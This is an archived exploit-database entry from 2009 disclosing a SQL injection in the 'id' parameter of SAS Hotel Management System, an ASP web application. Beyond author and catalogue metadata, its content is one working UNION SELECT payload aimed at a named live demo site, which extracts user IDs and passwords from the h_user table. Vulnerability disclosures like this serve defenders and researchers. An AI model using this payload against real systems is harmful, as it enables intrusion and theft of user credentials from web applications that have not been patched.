[] NeoSense

SAS Hotel Management System - 'id' SQL Injection

Author: Darkb0x
type: webapps
platform: asp
port: 
date_added: 2009-02-15 
date_updated: 2017-02-13 
verified: 1 
codes: OSVDB-51982 
tags: 
aliases:  
screenshot_url:  
application_url: 

#found by DarkB0x
#contact darkB0x97[AT]googlemail.com
#greets for str0ke & AlpHaNiX

#script           : SAS Hotel Management System
#download         : Null
#script home page : http://www.sellatsite.com/sellatsite/hotel.asp
#Demo             : http://www.aebest.com


#Exploits :

//*/

http://www.aebest.com/home/myhotel_info.asp?id=0+and+1=0+union+select+0,userid,0,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+h_user


#note : the injection's details are in page title ! xD

# milw0rm.com [2009-02-16]